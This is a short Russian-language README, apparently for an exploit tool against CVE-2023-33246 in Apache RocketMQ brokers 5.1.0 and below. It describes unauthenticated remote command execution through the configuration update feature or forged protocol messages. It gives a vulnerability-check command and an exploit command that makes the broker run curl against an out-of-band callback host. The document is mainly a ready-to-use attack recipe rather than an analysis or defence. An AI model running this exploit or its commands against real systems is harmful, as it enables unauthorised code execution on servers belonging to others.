
Эксплойт для CVE-2023-33246, нацеленный на брокеры Apache RocketMQ. Выполняет произвольные команды через неаутентифицированное обновление конфигурации или поддельные сообщения протокола на уязвимых версиях 5.1.0 и ниже.
CVE-2023-33246 Эксплойт удаленного выполнения кода RocketMQ
RocketMQ версии 5.1.0 и ниже уязвимы к произвольному внедрению кода (Arbitrary Code Injection). Компонент Broker RocketMQ доступен из экстранета и не имеет проверки прав. Злоумышленник может использовать эту уязвимость через функцию обновления конфигурации для выполнения команд от имени системного пользователя, под которым запущен RocketMQ. Кроме того, злоумышленник может добиться того же эффекта путем подделки содержимого протокола RocketMQ.
проверка
./RocketMQRceCheck -host 127.0.0.1 -port 9876
эксплойт
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test